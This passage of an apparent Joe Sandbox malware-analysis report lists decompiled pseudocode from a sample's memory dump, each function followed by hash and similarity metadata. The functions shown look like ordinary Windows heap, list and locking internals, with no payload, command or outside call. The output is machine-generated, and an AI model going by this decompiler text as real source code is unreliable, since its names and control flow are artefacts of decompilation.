                                                                                                            						_t64 =  *_t64;
                                                                                                            						 *_t47 =  *_t47 - 1;
                                                                                                            						if( *_t47 != 0) {
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                                                                                                            							L10:
                                                                                                            							_push(3);
                                                                                                            							asm("int 0x29");
                                                                                                            						} else {
                                                                                                            							_t48 =  *((intOrPtr*)(_t53 + 4));
                                                                                                            							if( *_t48 != _t53) {
                                                                                                            								goto L10;
                                                                                                            							} else {
                                                                                                            								 *_t48 = _t64;
                                                                                                            								_t61 =  &_v36;
                                                                                                            								 *((intOrPtr*)(_t64 + 4)) = _t48;
                                                                                                            								_t49 = _v32;
                                                                                                            								if( *_t49 != _t61) {
                                                                                                            									goto L10;
                                                                                                            								} else {
                                                                                                            									 *_t53 = _t61;
                                                                                                            									 *((intOrPtr*)(_t53 + 4)) = _t49;
                                                                                                            									 *_t49 = _t53;
                                                                                                            									_v32 = _t53;
                                                                                                            									goto L8;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L11:
                                                                                                            						_t51 = _v29;
                                                                                                            						goto L12;
                                                                                                            						L8:
                                                                                                            						if(_t64 != 0x1155768) {
                                                                                                            							_t67 = _v20;
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L12:
                                                                                                            				E0107FFB0(_t51, _t64, 0x1158a6c);
                                                                                                            				while(1) {
                                                                                                            					_t37 = _v28;
                                                                                                            					_t55 =  &_v28;
                                                                                                            					if(_t37 == _t55) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						_t59 =  *_t37;
                                                                                                            						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                                                                                                            							goto L10;
                                                                                                            						} else {
                                                                                                            							_t62 =  &_v28;
                                                                                                            							_v28 = _t59;
                                                                                                            							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L18:
                                                                                                            				}
                                                                                                            				_pop(_t65);
                                                                                                            				_pop(_t68);
                                                                                                            				_pop(_t52);
                                                                                                            				return E010AB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                                                                                                            				goto L18;
                                                                                                            			}


































                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d8f6e161cd1f008754d1c8cbc8e15ac2e6aecb5b3a931ce0c3dfc652fc9f135
                                                                                                            • Instruction ID: 644ead7d17ae5a1d5ce812486cdfbcc1f51a64bc16e96b011d3e66003f7e83b4
                                                                                                            • Opcode Fuzzy Hash: 0d8f6e161cd1f008754d1c8cbc8e15ac2e6aecb5b3a931ce0c3dfc652fc9f135
                                                                                                            • Instruction Fuzzy Hash: 3F318D71609312DFCB18DF29D58095AFBE1FF85624F44456EE8A89B249D730D904CB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 92%
                                                                                                            			E0109A70E(intOrPtr* __ecx, char* __edx) {
                                                                                                            				unsigned int _v8;
                                                                                                            				intOrPtr* _v12;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* _t16;
                                                                                                            				intOrPtr _t17;
                                                                                                            				intOrPtr _t28;
                                                                                                            				char* _t33;
                                                                                                            				intOrPtr _t37;
                                                                                                            				intOrPtr _t38;
                                                                                                            				void* _t50;
                                                                                                            				intOrPtr _t52;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t52 =  *0x1157b10; // 0x0
                                                                                                            				_t33 = __edx;
                                                                                                            				_t48 = __ecx;
                                                                                                            				_v12 = __ecx;
                                                                                                            				if(_t52 == 0) {
                                                                                                            					 *0x1157b10 = 8;
                                                                                                            					 *0x1157b14 = 0x1157b0c;
                                                                                                            					 *0x1157b18 = 1;
                                                                                                            					L6:
                                                                                                            					_t2 = _t52 + 1; // 0x1
                                                                                                            					E0109A990(0x1157b10, _t2, 7);
                                                                                                            					asm("bts ecx, eax");
                                                                                                            					 *_t48 = _t52;
                                                                                                            					 *_t33 = 1;
                                                                                                            					L3:
                                                                                                            					_t16 = 0;
                                                                                                            					L4:
                                                                                                            					return _t16;
                                                                                                            				}
                                                                                                            				_t17 = L0109A840(__edx, __ecx, __ecx, _t52, 0x1157b10, 1, 0);
                                                                                                            				if(_t17 == 0xffffffff) {
                                                                                                            					_t37 =  *0x1157b10; // 0x0
                                                                                                            					_t3 = _t37 + 0x27; // 0x27
                                                                                                            					__eflags = _t3 >> 5 -  *0x1157b18; // 0x0
                                                                                                            					if(__eflags > 0) {
                                                                                                            						_t38 =  *0x1157b9c; // 0x0
                                                                                                            						_t4 = _t52 + 0x27; // 0x27
                                                                                                            						_v8 = _t4 >> 5;
                                                                                                            						_t50 = L01084620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                                                                            						__eflags = _t50;
                                                                                                            						if(_t50 == 0) {
                                                                                                            							_t16 = 0xc0000017;
                                                                                                            							goto L4;
                                                                                                            						}
                                                                                                            						 *0x1157b18 = _v8;
                                                                                                            						_t8 = _t52 + 7; // 0x7
                                                                                                            						E010AF3E0(_t50,  *0x1157b14, _t8 >> 3);
                                                                                                            						_t28 =  *0x1157b14; // 0x0
                                                                                                            						__eflags = _t28 - 0x1157b0c;
                                                                                                            						if(_t28 != 0x1157b0c) {
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                                            						}
                                                                                                            						_t9 = _t52 + 8; // 0x8
                                                                                                            						 *0x1157b14 = _t50;
                                                                                                            						_t48 = _v12;
                                                                                                            						 *0x1157b10 = _t9;
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            					 *0x1157b10 = _t37 + 8;
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				 *__ecx = _t17;
                                                                                                            				 *_t33 = 0;
                                                                                                            				goto L3;
                                                                                                            			}

















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5feb3899183743ae5c5736fe3ecbf591f2f2297faaf1f253e89cff7874768fb
                                                                                                            • Instruction ID: 84b8f937e837ac969483c5cdbc3ff38fcdb58b26ac85440d5cc872bbfc1c8772
                                                                                                            • Opcode Fuzzy Hash: d5feb3899183743ae5c5736fe3ecbf591f2f2297faaf1f253e89cff7874768fb
                                                                                                            • Instruction Fuzzy Hash: 3D31D4B1700301DFCB29CF08EC92F69B7F9FB84710F544969E26587284D7709941C792
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E010961A0(signed int* __ecx) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v12;
                                                                                                            				intOrPtr* _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _t30;
                                                                                                            				intOrPtr _t31;
                                                                                                            				void* _t32;
                                                                                                            				intOrPtr _t33;
                                                                                                            				intOrPtr _t37;
                                                                                                            				intOrPtr _t49;
                                                                                                            				signed int _t51;
                                                                                                            				intOrPtr _t52;
                                                                                                            				signed int _t54;
                                                                                                            				void* _t59;
                                                                                                            				signed int* _t61;
                                                                                                            				intOrPtr* _t64;
                                                                                                            
                                                                                                            				_t61 = __ecx;
                                                                                                            				_v12 = 0;
                                                                                                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                                            				_v16 = __ecx;
                                                                                                            				_v8 = 0;
                                                                                                            				if(_t30 == 0) {
                                                                                                            					L6:
                                                                                                            					_t31 = 0;
                                                                                                            					L7:
                                                                                                            					return _t31;
                                                                                                            				}
                                                                                                            				_t32 = _t30 + 0x5d8;
                                                                                                            				if(_t32 == 0) {
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				_t59 = _t32 + 0x30;
                                                                                                            				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				if(__ecx != 0) {
                                                                                                            					 *((intOrPtr*)(__ecx)) = 0;
                                                                                                            					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                                                                            					_t51 =  *(_t32 + 0x10);
                                                                                                            					_t33 = _t32 + 0x10;
                                                                                                            					_v20 = _t33;
                                                                                                            					_t54 =  *(_t33 + 4);
                                                                                                            					if((_t51 | _t54) == 0) {
                                                                                                            						_t37 = E01095E50(0x10467cc, 0, 0,  &_v12);
                                                                                                            						if(_t37 != 0) {
                                                                                                            							goto L6;
                                                                                                            						}
                                                                                                            						_t52 = _v8;
                                                                                                            						asm("lock cmpxchg8b [esi]");
                                                                                                            						_t64 = _v16;
                                                                                                            						_t49 = _t37;
                                                                                                            						_v20 = 0;
                                                                                                            						if(_t37 == 0) {
                                                                                                            							if(_t64 != 0) {
                                                                                                            								 *_t64 = _v12;
                                                                                                            								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                                                                            							}
                                                                                                            							E01139D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                                                                            							_t31 = 1;
                                                                                                            							goto L7;
                                                                                                            						}
                                                                                                            						E0106F7C0(_t52, _v12, _t52, 0);
                                                                                                            						if(_t64 != 0) {
                                                                                                            							 *_t64 = _t49;
                                                                                                            							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                                                                            						}
                                                                                                            						L12:
                                                                                                            						_t31 = 1;
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					if(_t61 != 0) {
                                                                                                            						 *_t61 = _t51;
                                                                                                            						_t61[1] = _t54;
                                                                                                            					}
                                                                                                            					goto L12;
                                                                                                            				} else {
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            			}




















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4f480189face2e11a1ea46a8c2b3d4dcd38d7d23a655ea34b4255eee4f995554
                                                                                                            • Instruction ID: e4651b71dfae40460a0e619c642b35bfafd4ec25ecd19b88a3c331226d6fa6a9
                                                                                                            • Opcode Fuzzy Hash: 4f480189face2e11a1ea46a8c2b3d4dcd38d7d23a655ea34b4255eee4f995554
                                                                                                            • Instruction Fuzzy Hash: F8316EB16057018FE760CF1DC950B2ABBE5FB88B04F0949ADEAD49B351E7B1D804CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 95%
                                                                                                            			E0106AA16(signed short* __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				signed short _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				signed short _v24;
                                                                                                            				signed short _v28;
                                                                                                            				void* _v32;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr _t25;
                                                                                                            				signed short _t38;
                                                                                                            				signed short* _t42;
                                                                                                            				signed int _t44;
                                                                                                            				signed short* _t52;
                                                                                                            				signed short _t53;
                                                                                                            				signed int _t54;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t54;
                                                                                                            				_t42 = __ecx;
                                                                                                            				_t44 =  *__ecx & 0x0000ffff;
                                                                                                            				_t52 =  &(__ecx[2]);
                                                                                                            				_t51 = _t44 + 2;
                                                                                                            				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                                                                            					L4:
                                                                                                            					_t25 =  *0x1157b9c; // 0x0
                                                                                                            					_t53 = L01084620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                                                                            					__eflags = _t53;
                                                                                                            					if(_t53 == 0) {
                                                                                                            						L3:
                                                                                                            						return E010AB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                                                                            					} else {
                                                                                                            						E010AF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                                                                            						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                            						L2:
                                                                                                            						_t51 = 4;
                                                                                                            						if(L01076C59(_t53, _t51, _t58) != 0) {
                                                                                                            							_t28 = E01095E50(0x104c338, 0, 0,  &_v32);
                                                                                                            							__eflags = _t28;
                                                                                                            							if(_t28 == 0) {
                                                                                                            								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                                                                            								__eflags = _t38;
                                                                                                            								_v24 = _t53;
                                                                                                            								_v16 = _t38;
                                                                                                            								_v20 = 0;
                                                                                                            								_v12 = 0;
                                                                                                            								E0109B230(_v32, _v28, 0x104c2d8, 1,  &_v24);
                                                                                                            								_t28 = E0106F7A0(_v32, _v28);
                                                                                                            							}
                                                                                                            							__eflags = _t53 -  *_t52;
                                                                                                            							if(_t53 !=  *_t52) {
                                                                                                            								_t28 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t53 =  *_t52;
                                                                                                            				_t44 = _t44 >> 1;
                                                                                                            				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                                                                            				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				goto L2;
                                                                                                            			}





















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 58%
                                                                                                            			E010A4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int* _v12;
                                                                                                            				char _v13;
                                                                                                            				signed int _v16;
                                                                                                            				char _v21;
                                                                                                            				signed int* _v24;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t29;
                                                                                                            				signed int* _t32;
                                                                                                            				signed int* _t41;
                                                                                                            				signed int _t42;
                                                                                                            				void* _t43;
                                                                                                            				intOrPtr* _t51;
                                                                                                            				void* _t52;
                                                                                                            				signed int _t53;
                                                                                                            				signed int _t58;
                                                                                                            				void* _t59;
                                                                                                            				signed int _t60;
                                                                                                            				signed int _t62;
                                                                                                            
                                                                                                            				_t49 = __edx;
                                                                                                            				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                                                                            				_t26 =  *0x115d360 ^ _t62;
                                                                                                            				_v8 =  *0x115d360 ^ _t62;
                                                                                                            				_t41 = __ecx;
                                                                                                            				_t51 = __edx;
                                                                                                            				_v12 = __ecx;
                                                                                                            				if(_a4 == 0) {
                                                                                                            					if(_a8 != 0) {
                                                                                                            						goto L1;
                                                                                                            					}
                                                                                                            					_v13 = 1;
                                                                                                            					E01082280(_t26, 0x1158608);
                                                                                                            					_t58 =  *_t41;
                                                                                                            					if(_t58 == 0) {
                                                                                                            						L11:
                                                                                                            						E0107FFB0(_t41, _t51, 0x1158608);
                                                                                                            						L2:
                                                                                                            						 *0x115b1e0(_a4, _a8);
                                                                                                            						_t42 =  *_t51();
                                                                                                            						if(_t42 == 0) {
                                                                                                            							_t29 = 0;
                                                                                                            							L5:
                                                                                                            							_pop(_t52);
                                                                                                            							_pop(_t59);
                                                                                                            							_pop(_t43);
                                                                                                            							return E010AB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                                                                            						if(_v21 != 0) {
                                                                                                            							_t53 = 0;
                                                                                                            							E01082280(_t28, 0x1158608);
                                                                                                            							_t32 = _v24;
                                                                                                            							if( *_t32 == _t58) {
                                                                                                            								 *_t32 = _t42;
                                                                                                            								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                                                                            								if(_t58 != 0) {
                                                                                                            									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                                                                            									asm("sbb edi, edi");
                                                                                                            									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							E0107FFB0(_t42, _t53, 0x1158608);
                                                                                                            							if(_t53 != 0) {
                                                                                                            								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t29 = _t42;
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            					if( *((char*)(_t58 + 0x40)) != 0) {
                                                                                                            						L10:
                                                                                                            						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                                                                            						E0107FFB0(_t41, _t51, 0x1158608);
                                                                                                            						_t29 = _t58;
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                                            					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				L1:
                                                                                                            				_v13 = 0;
                                                                                                            				_t58 = 0;
                                                                                                            				goto L2;
                                                                                                            			}
























                                                                                                            0x010a4acd
                                                                                                            0x010a4ad5
                                                                                                            0x010a4ada
                                                                                                            0x00000000
                                                                                                            0x010a4ada
                                                                                                            0x010a4ac2
                                                                                                            0x010a4acb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010a4acb
                                                                                                            0x010a4a53
                                                                                                            0x010a4a53
                                                                                                            0x010a4a58
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9dd0d38f14f186c3588bcbcf502082e8963c874661d61ae2f57dc7a949934adf
                                                                                                            • Instruction ID: 92c4e0f5312ca8ed5f38dcf5eb1169f420c93c235c2a85b949138d76032bc142
                                                                                                            • Opcode Fuzzy Hash: 9dd0d38f14f186c3588bcbcf502082e8963c874661d61ae2f57dc7a949934adf
                                                                                                            • Instruction Fuzzy Hash: 4F313836605311DBC7A1EFA9C941B2ABBE4FFD0710F88446DE8E687641CBB0D841CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E010A8EC7(void* __ecx, void* __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				char* _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				signed int* _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				intOrPtr _v52;
                                                                                                            				intOrPtr _v56;
                                                                                                            				signed int* _v60;
                                                                                                            				intOrPtr _v64;
                                                                                                            				intOrPtr _v68;
                                                                                                            				intOrPtr _v72;
                                                                                                            				char* _v76;
                                                                                                            				intOrPtr _v80;
                                                                                                            				signed int _v84;
                                                                                                            				intOrPtr _v88;
                                                                                                            				intOrPtr _v92;
                                                                                                            				intOrPtr _v96;
                                                                                                            				intOrPtr _v100;
                                                                                                            				intOrPtr _v104;
                                                                                                            				signed int* _v108;
                                                                                                            				char _v140;
                                                                                                            				signed int _v144;
                                                                                                            				signed int _v148;
                                                                                                            				intOrPtr _v152;
                                                                                                            				char _v156;
                                                                                                            				intOrPtr _v160;
                                                                                                            				char _v164;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* _t67;
                                                                                                            				intOrPtr _t70;
                                                                                                            				void* _t71;
                                                                                                            				void* _t72;
                                                                                                            				signed int _t73;
                                                                                                            
                                                                                                            				_t69 = __edx;
                                                                                                            				_v8 =  *0x115d360 ^ _t73;
                                                                                                            				_t48 =  *[fs:0x30];
                                                                                                            				_t72 = __edx;
                                                                                                            				_t71 = __ecx;
                                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                                                                            					_t48 = E01094E70(0x11586e4, 0x10a9490, 0, 0);
                                                                                                            					if( *0x11553e8 > 5 && E010A8F33(0x11553e8, 0, 0x2000) != 0) {
                                                                                                            						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                                                                            						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                                                                            						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                                                                            						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                                                                            						_v108 =  &_v84;
                                                                                                            						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                                                                            						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                                                                            						_v76 =  &_v156;
                                                                                                            						_t70 = 8;
                                                                                                            						_v60 =  &_v144;
                                                                                                            						_t67 = 4;
                                                                                                            						_v44 =  &_v148;
                                                                                                            						_v152 = 0;
                                                                                                            						_v160 = 0;
                                                                                                            						_v104 = 0;
                                                                                                            						_v100 = 2;
                                                                                                            						_v96 = 0;
                                                                                                            						_v88 = 0;
                                                                                                            						_v80 = 0;
                                                                                                            						_v72 = 0;
                                                                                                            						_v68 = _t70;
                                                                                                            						_v64 = 0;
                                                                                                            						_v56 = 0;
                                                                                                            						_v52 = 0x11553e8;
                                                                                                            						_v48 = 0;
                                                                                                            						_v40 = 0;
                                                                                                            						_v36 = 0x11553e8;
                                                                                                            						_v32 = 0;
                                                                                                            						_v28 =  &_v164;
                                                                                                            						_v24 = 0;
                                                                                                            						_v20 = _t70;
                                                                                                            						_v16 = 0;
                                                                                                            						_t69 = 0x104bc46;
                                                                                                            						_t48 = E010E7B9C(0x11553e8, 0x104bc46, _t67, 0x11553e8, _t70,  &_v140);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E010AB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                                                                            			}


                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95c2207fbf876ed208a46543e887111e49e0778f7c34e031ba9925a7ad44d862
                                                                                                            • Instruction ID: bc7f37ccac3e6d0bf57329524d3dcd37ea943bebf41d9dc27f5a46f8ad855890
                                                                                                            • Opcode Fuzzy Hash: 95c2207fbf876ed208a46543e887111e49e0778f7c34e031ba9925a7ad44d862
                                                                                                            • Instruction Fuzzy Hash: BC419FB1D002189EDB64CFAAD980AEDFBF8FB48310F5081AEE559A7240E7705A84CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 74%
                                                                                                            			E0109E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                                                                            				intOrPtr* _v0;
                                                                                                            				signed char _v4;
                                                                                                            				signed int _v8;
                                                                                                            				void* __ecx;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t37;
                                                                                                            				intOrPtr _t38;
                                                                                                            				signed int _t44;
                                                                                                            				signed char _t52;
                                                                                                            				void* _t54;
                                                                                                            				intOrPtr* _t56;
                                                                                                            				void* _t58;
                                                                                                            				char* _t59;
                                                                                                            				signed int _t62;
                                                                                                            
                                                                                                            				_t58 = __edx;
                                                                                                            				_push(0);
                                                                                                            				_push(4);
                                                                                                            				_push( &_v8);
                                                                                                            				_push(0x24);
                                                                                                            				_push(0xffffffff);
                                                                                                            				if(E010A9670() < 0) {
                                                                                                            					L010BDF30(_t54, _t58, _t35);
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					asm("int3");
                                                                                                            					_push(_t54);
                                                                                                            					_t52 = _v4;
                                                                                                            					if(_t52 > 8) {
                                                                                                            						_t37 = 0xc0000078;
                                                                                                            					} else {
                                                                                                            						_t38 =  *0x1157b9c; // 0x0
                                                                                                            						_t62 = _t52 & 0x000000ff;
                                                                                                            						_t59 = L01084620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                                                                            						if(_t59 == 0) {
                                                                                                            							_t37 = 0xc0000017;
                                                                                                            						} else {
                                                                                                            							_t56 = _v0;
                                                                                                            							 *(_t59 + 1) = _t52;
                                                                                                            							 *_t59 = 1;
                                                                                                            							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                                                                            							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                                                                            							_t44 = _t62 - 1;
                                                                                                            							if(_t44 <= 7) {
                                                                                                            								switch( *((intOrPtr*)(_t44 * 4 +  &M0109E810))) {
                                                                                                            									case 0:
                                                                                                            										L6:
                                                                                                            										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                                                                            										goto L7;
                                                                                                            									case 1:
                                                                                                            										L13:
                                                                                                            										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                                                                            										goto L6;
                                                                                                            									case 2:
                                                                                                            										L12:
                                                                                                            										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                                                                            										goto L13;
                                                                                                            									case 3:
                                                                                                            										L11:
                                                                                                            										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                                                                            										goto L12;
                                                                                                            									case 4:
                                                                                                            										L10:
                                                                                                            										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                                                                            										goto L11;
                                                                                                            									case 5:
                                                                                                            										L9:
                                                                                                            										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                                                                            										goto L10;
                                                                                                            									case 6:
                                                                                                            										L17:
                                                                                                            										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                                                                            										goto L9;
                                                                                                            									case 7:
                                                                                                            										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                                                                            										goto L17;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L7:
                                                                                                            							 *_a40 = _t59;
                                                                                                            							_t37 = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t37;
                                                                                                            				} else {
                                                                                                            					_push(0x20);
                                                                                                            					asm("ror eax, cl");
                                                                                                            					return _a4 ^ _v8;
                                                                                                            				}
                                                                                                            			}


















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bcc488b43da6ea097a54fcfd9dc5ddc03b51c7676c038fd4a27b32c2a2c50060
                                                                                                            • Instruction ID: fb97e8dcc68b6c8bd3113c568ca49142aeebebfd13c1bb4de31513d7cd8ce9ca
                                                                                                            • Opcode Fuzzy Hash: bcc488b43da6ea097a54fcfd9dc5ddc03b51c7676c038fd4a27b32c2a2c50060
